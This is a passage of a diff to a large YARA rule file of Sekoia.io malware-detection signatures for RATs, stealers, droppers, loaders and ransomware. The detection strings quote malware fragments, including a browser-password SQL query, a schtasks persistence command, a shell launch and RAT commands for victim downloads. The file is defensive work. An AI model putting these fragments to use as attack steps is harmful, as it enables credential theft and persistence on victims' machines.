+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "b62c912de846e743effdf7e5654a7605"
+		hash = "61d7b2c7814971e5323ec67b3a3d7f45"
+		hash = "ce35c935dcc9d55b2c79945bac77dc8e"
+		hash = "f50c83a4147b86cdb20cc1fbae458865"
+		hash = "05957d98a75c04597649295dc846682d"
+		hash = "33c9a47debdb07824c6c51e13740bdfe"
+		logic_hash = "49c5f635e3873a145479bb164838043921d012eef7dc8ad6373c43c8cf1f14e0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240113,56 +240912,54 @@ rule SEKOIA_Koiloader_Powershell_Reflective_Loading : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "[Byte[]]$image" ascii fullword
-		$s2 = "function GDT"
-		$s3 = "function GPA"
-		$s4 = "GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])"
-		$s5 = "$marshal::GetDelegateForFunctionPointer($CTAddr, $CTDeleg)"
+		$cmd_PondRAT1 = "_Z7MsgDownP11_TRANS_INFO" ascii
+		$cmd_PondRAT2 = "_Z5MsgUpP11_TRANS_INFO" ascii
+		$cmd_PondRAT3 = "_Z6MsgRunP11_TRANS_INFO" ascii
+		$cmd_PondRAT4 = "_Z6MsgCmdP11_TRANS_INFO" ascii
 
 	condition:
-		$s1 at 0 and 4 of them
+		3 of them and filesize < 4MB
 }
-rule SEKOIA_Observerstealer : FILE
+rule SEKOIA_Dropper_Win_Selfau3
 {
 	meta:
-		description = "detection based on the strings"
+		description = "Finds SelfAU3 Dropper samples based on specific strings"
 		author = "Sekoia.io"
-		id = "52314870-c100-441d-9ccf-07588325a401"
-		date = "2024-02-01"
+		id = "2d005a54-b013-40e9-b88a-30454e4b22af"
+		date = "2024-02-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/observerstealer.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "690bd5a16e780884641a66f06256a4147c092788f155644a8589d38b70dc4acc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/dropper_win_selfau3.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5f69457127ae6cb84b04f72dd30393dbcf32b4ba26ec6d529eebcc03191cbed3"
 		score = 75
-		quality = 55
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "URLOpenBlockingStreamW" ascii
-		$s2 = "processGrabber" wide
-		$s3 = "grabbers" wide
-		$s4 = {2F 00 73}
-		$s5 = "UNKNOWN_HWID" ascii
-		$s6 = {48 00 57 00 49 00 44}
+		$sfx = "!Require Windows" ascii
+		$ins01 = ";!@Install@!UTF-8!" ascii
+		$set = {53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 3d 22 [1-15] 3d ?? 22}
+		$run = "RunProgram=\"hidcon:c" ascii
+		$ins02 = ";!@InstallEnd@!" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 400KB and all of them
+		$sfx at 77 and $set in ( @ins01 .. @ins01 + 500 ) and #set > 5 and $run in ( @set .. @set + 1000 ) and $ins02 in ( @run .. @run + 500 )
 }
-rule SEKOIA_Apt_Cloudmensis_Spyagent_Strings : FILE
+rule SEKOIA_Rat_Win_Millenium : FILE
 {
 	meta:
-		description = "Detects CloudMensis SpyAgent"
+		description = "Finds MilleniumRAT samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "c2df8373-6698-4b23-9d77-8e7968bd69f0"
-		date = "2022-07-26"
+		id = "91320924-5c74-457a-8601-29c4e4034761"
+		date = "2023-11-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudmensis_spyagent_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ad858b1b78fb4ac6efee093b11fde14956d63bc6b300ef37bf1f2a3356cf4402"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_millenium.yar#L1-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bcf4158b9bfee65cd9bd74163ac108ea1de8ec0e9ad066e77bec788ae6fb7283"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240170,27 +240967,37 @@ rule SEKOIA_Apt_Cloudmensis_Spyagent_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[control_thread loop_DirStructure:]"
-		$ = "[screen_keylog getScreenShotData]"
-		$ = "[screen_keylog loop_usb]"
-		$ = "[Management UploadFilebyPath:destination:]"
-		$ = "[control_thread loop_pwd:]"
+		$str01 = "Millenium RAT, version:" wide
+		$str02 = "Coded by @shinyenigma" wide
+		$str03 = "*gift*<NEW TOKEN>*<NEW CHAT ID>*<message> - gift this bot to another user, his telegram bot has to be started" wide
+		$str04 = "*historyForce - grab more browser history by killing browser processes, use carefully" wide
+		$str05 = "*download - victim`s PC downloads a file attached to this message, if it is a picture it should also be attached as a file" wide
+		$str06 = "No keylogs recorded!" wide
+		$str07 = "Successfully added RAT to startup" wide
+		$str08 = "You`ve gifted gifted a bot:" wide
+		$str09 = "Incorrect agrument, please enter 0/90/180/270" wide
+		$str10 = "SELECT action_url, username_value, password_value FROM logins" wide
+		$str11 = "Yandex\\YandexBrowser\\User Data\\Default" wide
+		$str12 = "Millenium-rat-CSharp (main project)" ascii
+		$str13 = "get_BatteryLifePercent" ascii
+		$str14 = "get_ExpirationMonth" ascii
+		$str15 = "sqlite3_extension_init " ascii
 
 	condition:
-		uint32be( 0 ) == 0xcafebabe and filesize < 2MB and all of them
+		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
 }
-rule SEKOIA_Infostealer_Win_Monster_Stub : FILE
+rule SEKOIA_Apt_Badmagic_Reco_Pshscript : FILE
 {
 	meta:
-		description = "Finds Monster Stealer stub (Python payload) based on specific strings."
+		description = "Detects BadMagic Reco powershell script"
 		author = "Sekoia.io"
-		id = "10d27d49-79ae-4edc-8c30-35506bdf2c42"
-		date = "2024-08-07"
+		id = "7a1b2d31-03b7-4a43-8f4e-ed38ba8e118e"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_monster_stub.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d6362c54b1f56ffa878423fbb1a3f57508d20e06b573c732f892494178a49200"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_reco_pshscript.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "86369267545241f33c6fc7dab11eb06f71641d8e9cd0365ddcc676d4f4c9739b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240198,67 +241005,58 @@ rule SEKOIA_Infostealer_Win_Monster_Stub : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "https://t.me/monster_free_cloud" ascii
-		$str02 = "MonsterUpdateService" ascii
-		$str03 = "Monster.exe" ascii
-		$str04 = "schtasks /create /f /sc daily /ri 30 /tn" ascii
-		$str05 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\" ascii
-		$str06 = "banned_uuids" ascii
-		$str07 = "banned_computer_names" ascii
-		$str08 = "banned_process" ascii
-		$str09 = "register_X_browsers" ascii
-		$str10 = "register_payload" ascii
-		$str11 = "tiktok_sessions.txt" ascii
-		$str12 = "spotify_sessions.txt" ascii
-		$str13 = "network_info.txt" ascii
-		$str14 = "lolz.guru" ascii
-		$str15 = "echo ####System Info####" ascii
-		$str16 = "echo ####Firewallinfo####" ascii
-		$str17 = "/injection/main/injection.js" ascii
+		$ = "$headers = @{};"
+		$ = "==ARP Cache=="
+		$ = "ipconfig.me"
+		$ = "-ComputerName $env:computername;"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		all of them and filesize < 1KB
 }
-
-rule SEKOIA_Dropper_Win_Ninerat
+rule SEKOIA_Ransomware_Win_Raworld
 {
 	meta:
-		description = "NineRAT dropper"
+		description = "Detects files related to stage 1 of a campaign from the ransomware group RA World."
 		author = "Sekoia.io"
-		id = "798e3bee-4cee-4647-abda-3c3dcc602f0a"
-		date = "2023-12-12"
+		id = "a9ed9c5a-7a0e-4c2e-90f4-d52f5589b2b8"
+		date = "2024-07-24"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/dropper_win_ninerat.yar#L4-L41"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "00f69545c7351fba8b45e2b4d21855ba8ae94f2d10df199732665e8f3f00c1b4"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_raworld.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "583dd2ea8e20a87d0b67783d1dd59212eb133de1f945d5b4afad89e8a5017d35"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433"
-		hash2 = "f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59"
 
 	strings:
-		$ = "\\x64\\Release\\Dropper.pdb"
-		$ = "TelegramRat\\lastest\\Dropper"
+		$s1 = "Loder.exe" ascii fullword
+		$s2 = "Stage2.exe" wide
+		$s3 = "SYSVOL" wide
+		$s4 = "Finish.exe" wide
+		$s5 = "Exclude.exe" wide
+		$s6 = "Stage3.exe" wide
+		$s7 = "Pay.txt" ascii fullword
+		$s8 = "RA World" ascii fullword
+		$s9 = "Stage1.exe" ascii fullword
 
 	condition:
-		all of them or pe.imphash ( ) == "92b8e9dea06fd5719e29a510e95b92ac" or hash.md5 ( pe.rich_signature.clear_data ) == "ba1ea20fe779ef0b747e5073c0881a99" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c0471e0a78eef692b567cd89eeaddf08" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "965dc8b7c98325ca3d3371ced8424823" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "bae1db350e313bf7bbd3b2178b20e6f6dd9b0331780099374edae5a99625bc5b" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "1abb447513b4435837029933e722b6ed92222291571a8ce0a306c9f6a335aa19" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ffbcd5bbe6c02aa5c993886811d7597f020abd6665fc82af133c5756ab72fb0a" )
+		4 of them
 }
-rule SEKOIA_Win_Infostealer_Serpent_Strings : FILE
+rule SEKOIA_Guloader_Vbscript : FILE
 {
 	meta:
-		description = "Serpent Stealer string"
+		description = "visual basic script delivering GuLoader"
 		author = "Sekoia.io"
-		id = "ad9e2366-c95e-4090-a0db-48f3cc325209"
-		date = "2023-12-04"
+		id = "3472e403-b1e6-4fdf-9770-af42d505b556"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/win_infostealer_serpent_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5266d1c8228f02e8ac9da5ddd8b968fde0d0e83afa408d405ec4ca50c3453928"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/guloader_vbscript.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d0398b19ec57cff8afd52b06dc9da18788b1eefdf6be70650138e9b342d91d24"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240266,57 +241064,47 @@ rule SEKOIA_Win_Infostealer_Serpent_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "User Has SSH Dir." wide
-		$s2 = "[+] Executing Wallets" wide
-		$s3 = "'serpent' folder" wide
-		$s4 = "Buddy Kys!!!" wide
-		$s5 = "http://checkip.dyndns.org/" wide
-		$s6 = "[+] Target has discord installed" wide
-		$s7 = "Target has minecraft." wide
+		$s1 = " = CreateObject(\"WScript.Shell\")"
+		$s2 = " = Join("
+		$s3 = ",vbnullstring)"
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize < 100KB and 5 of them
+		filesize < 20KB and all of them and #s1 > 1 and @s3- @s2 < 16
 }
-rule SEKOIA_Apt_Andariel_Siennablue : FILE
+
+rule SEKOIA_Latrodectus_Exports : FILE
 {
 	meta:
-		description = "Detects SiennaBlue based routine names"
+		description = "detection based on the exports"
 		author = "Sekoia.io"
-		id = "ab3f8b49-0851-47a8-ac77-98d4e26f448e"
-		date = "2023-11-16"
+		id = "29076cf5-f391-42f2-918f-e1c929bd368d"
+		date = "2024-07-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_andariel_siennablue.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0876deb2e76098ac8d304737243d3a76e9741b2ca1570034bec51fea5a40818d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/latrodectus_exports.yar#L3-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "01385f31b1f2fc94453a2ead136a1f7fb253a72bee95f74d755acfa97abdb26d"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "main_cryptAVPass"
-		$ = "main_DecryptString"
-		$ = "main_DisableNetworkDevice"
-		$ = "main_DeleteSchTask"
-
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 4MB and filesize < 15MB and all of them
+		(pe.exports ( "stow" ) or pe.exports ( "homq" ) or pe.exports ( "scub" ) ) and pe.number_of_exports >= 3 and uint16( 0 ) == 0x5a4d
 }
-rule SEKOIA_Apt_Unk_Malicious_Lnk : FILE
+rule SEKOIA_Apt_Luckymouse_Compromised_Electronapp : FILE
 {
 	meta:
-		description = "Detects a malicious LNK used by an APT"
+		description = "Detects compromised ElectronApp"
 		author = "Sekoia.io"
-		id = "d2248803-7ddf-4cde-ab6a-78b20e760919"
-		date = "2024-09-06"
+		id = "7702217d-771f-47af-8eaa-d5acf1e14f4d"
+		date = "2022-08-05"
 		modified = "2024-12-19"
-		reference = "https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_unk_malicious_lnk.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "a8d7e56eb01a8cf576533db9af2e92ec"
-		logic_hash = "993411ceba45d1212a4840e6a35b72b52e64e78cbb2599ebc5c70c2fd3b8e552"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_luckymouse_compromised_electronapp.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "939546b75d5f7161bb8eb1fd838a9a7c0c88cb58a0f01f67e687523e5b31b0aa"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240324,26 +241112,23 @@ rule SEKOIA_Apt_Unk_Malicious_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".pdf.lnkPK"
-		$ = ".jfifPK"
-		$ = ".batPK"
-		$ = ".pdfPK"
+		$s = "module.exports=function(t){eval(function(p,a,c,k,e,r)"
 
 	condition:
-		uint32be( 0 ) == 0x504b0304 and all of them
+		$s at 0 and filesize < 100KB
 }
-rule SEKOIA_Trojan_Android_Brata : FILE
+rule SEKOIA_Tool_Ehole : FILE
 {
 	meta:
-		description = "Detect samples of the Android banking trojan BRATA"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "fde9b82e-c677-44ed-b512-b225a3aba201"
-		date = "2022-01-27"
+		id = "7d30ffd0-fada-4ef4-98c3-5572a4e1e140"
+		date = "2023-06-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/trojan_android_brata.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0c94e5e0c01d4fa9bf28603787029938a3159f468dd3876e7d25646e93dd68b8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_ehole.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "df937417b2f8e12f80fbe2edaa0863de6ed7862c117dff2a21255cb7d1d9ad3d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240351,71 +241136,68 @@ rule SEKOIA_Trojan_Android_Brata : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$goo0 = "Google Play services error"
-		$goo1 = "Error de Serveis de Google Play"
-		$goo2 = "Fehler bei Zugriff auf Google Play-Dienste"
-		$goo3 = "Erro nos servizos de Google Play"
-		$goo4 = "Fout met Google Play-services"
-		$goo5 = "Virhe Google Play -palveluissa"
-		$goo6 = "Erro do Google Play Services"
-		$goo7 = "Error de Google Play Services"
-		$res0 = "res/xml/device_admin.xml"
-		$res1 = "res/xml/windowchangedetectingservice.xml"
-		$res2 = "res/xml-v22/windowchangedetectingservice.xml"
+		$s1 = "main.http400"
+		$s2 = "main.fofa_c"
+		$s3 = "main.Jsjump"
+		$s4 = "main.StandBase64"
+		$s5 = "main.fofa_http"
+		$s6 = "main.fofa_seach"
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and filesize > 2MB and filesize < 6MB and 7 of ( $goo* ) and 2 of ( $res* )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 11MB and all of them
 }
-rule SEKOIA_Backdoor_Win_Rokrat : FILE
+rule SEKOIA_Crime_Sload_Powershellarchiveexfiltrator_Strings : FILE
 {
 	meta:
-		description = "Detect the RokRAT malware"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "97a3acc1-4120-4d67-a6ad-fa204f2fd7f5"
-		date = "2023-07-11"
+		id = "3934696a-2116-49cb-9f75-3740767ad6f3"
+		date = "2022-08-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_rokrat.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "42e0b8583570d32a5d6a5bed175a53951e7d68d8471a283ef245686621dc01c4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crime_sload_powershellarchiveexfiltrator_strings.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7d6234ced7e5915a5b27ce2065772c74adb5c2398a8c972421fb5ec6b1b7771f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "84760cac26513915ebfb0a80ad3ddabe62f03ec4fda227d63e764f9c4a118c4e"
-		hash2 = "758348521331bb18241d1cfc90d7e687dbc5bad8d596a2b2d6a9deb6cfc8cb1d"
-		hash3 = "2a253c2aa1db3f809c86f410e4bd21f680b7235d951567f24d614d8e4d041576"
-		hash4 = "ebce34cdeb20bc8c75249ce87a3080054f48b03ef66572fbc9dc40e6c36310d6"
-		hash5 = "a1e4e95a20120f16adacb342672eec1e73bd7826b332096f046bb7e2b7cd80a1"
-		hash6 = "3be58a7a7a25dbceee9e7ef06ef20aa86aef083be19db9e5ffb181d3f9f6615a"
-		hash7 = "fa4df84071b9ae20b321e4d22162d8480f6992206bc046e403c2fbedd1655503"
-		hash8 = "aa76b4db29cf929b4b22457ccb8cd77308191f091cde2f69e578ade9708d7949"
 
 	strings:
-		$ = "--wwjaughalvncjwiajs--"
-		$ = {7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 22 00 25 00 73 00 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 7b 00 22 00 2e 00 74 00 61 00 67 00 22 00 3a 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 7d 00 7d}
-		$ = {68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 6c 00 6f 00 75 00 64 00 2d 00 61 00 70 00 69 00 2e 00 79 00 61 00 6e 00 64 00 65 00 78 00 2e 00 6e 00 65 00 74 00 2f 00 76 00 31 00 2f 00 64 00 69 00 73 00 6b 00 2f 00 72 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 2f 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3f 00 70 00 61 00 74 00 68 00 3d 00 25 00 73 00 26 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 3d 00 25 00 73}
+		$ = "if ($wr1 -or $wr2){"
+		$ = "if ($zp1 -or $zp2){"
+		$ = "-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Malware_Tinyshell_Strings : FILE
+rule SEKOIA_Apt_Icepeony_Icecache : FILE
 {
 	meta:
-		description = "Detects TinyShell based on strings"
+		description = "Detects IceCache backdoor"
 		author = "Sekoia.io"
-		id = "51fe9986-cb33-4802-bb8d-fe3d4cdfdcc8"
-		date = "2024-09-04"
+		id = "3135c70e-c925-4d26-beed-09424fc0c153"
+		date = "2024-10-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_tinyshell_strings.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "fffc89ebbe6ea37072077996e27f86dd"
-		hash = "59a97d4fbd3a54e991dc7e1f0451acf5"
-		hash = "d7ee59eab7f703bfaf1002a39b05c7b9"
-		hash = "3f2dfe47d4563919d889132b2759fd9c"
-		logic_hash = "18d10e7e6f0ba8a9ea7fa8446a930f84ce5eb2f3a022ce3dc62bc3f8fd5699e1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_icepeony_icecache.yar#L1-L46"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "38708c33dafb5625ddde1030a7efa7db"
+		hash = "1e102c8909b2bf71c626b81f7526ee01"
+		hash = "34bc3c586a48f836b00aff59fe891b30"
+		hash = "cd906f4cef84dddeb644b06777474b2e"
+		hash = "add23fedfbf238f51173796f3feb12af"
+		hash = "25b8daaa5e9c5f8820261d7ebf79f3cd"
+		hash = "7fd45cc1de1230c916d5f547a9fc725c"
+		hash = "e6e4060e838d7af5f13ad64258d5db0c"
+		hash = "87dfc911885420380bea0cf74c8160d3"
+		hash = "bd15103b300cad635191972330913d17"
+		hash = "a8119b7803a6e0b8aed6bc74d9062b7f"
+		hash = "e1bc3efc33b57c9e1e6d37e5011228f2"
+		hash = "e1233a5f613aafec2c28133e810f536d"
+		hash = "fe88a5b91841b25b4bafa08d42faab22"
+		logic_hash = "db82489e1a1eb55960b7a8fd3e6f52db526295ed4e5b90ddea826c5be5f9a1c4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240423,149 +241205,130 @@ rule SEKOIA_Malware_Tinyshell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "_tsh_get_file"
-		$ = "_tsh_put_file"
-		$ = "_tsh_runshell"
-		$ = "Authentication failed."
-		$ = "pel_send_msg"
-		$ = "exec bash --login"
+		$ = "Source Response Empty!"
+		$ = "Source Response Len:"
+		$ = "GetFromSource:"
+		$ = "Failed add header!"
+		$ = "Failed receive response:"
+		$ = "Error: Status Code :"
+		$ = "WinHttpAddRequestHeaders"
+		$ = "X-FORWARDED-HOST:"
+		$ = "PROXY_DEL_CONTENT"
+		$ = "PROXY_CLEAR_CONTENT"
+		$ = "PROXY_SET_JS"
+		$ = "PROXY_GET_JS"
+		$ = "PROXY_ALLOW_PC"
+		$ = "Parse IP failed :"
+		$ = "Clear Proxy Contents Success!"
+		$ = "FILE_UPLOAD"
+		$ = "FILE_DOWNLOAD"
 
 	condition:
-		3 of them and filesize < 150KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 6 of them
 }
-rule SEKOIA_Apt_Apt10_Hui_Loader : FILE
+rule SEKOIA_Infostealer_Win_Grmsk_Strings : FILE
 {
 	meta:
-		description = "Specific string for HUI Loader"
+		description = "Finds GrMsk samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "97d17052-80d0-4f8e-8b3a-2e0d622522a9"
-		date = "2022-07-04"
+		id = "58f32339-5e0f-405c-9acc-14b93f6c208b"
+		date = "2023-11-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt10_hui_loader.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "33df202599c6bceff2cf76acdc0096f7167acb69c541b3cfe4cdc34edc174005"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_grmsk_strings.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a2f638556edf5b2cabcd67e7d29a9e3f554b707af688f79b89f2f67d493093b3"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "HUIHWASDIHWEIUDHDSFSFEFWEFEWFDSGEFERWGWEEFWFWEWD" wide fullword
+		$str01 = "ref.txt" ascii fullword
+		$str02 = "--------" ascii fullword
+		$str03 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.834.0 Mobile Safari/5362" ascii fullword
+		$str04 = "POST" ascii fullword
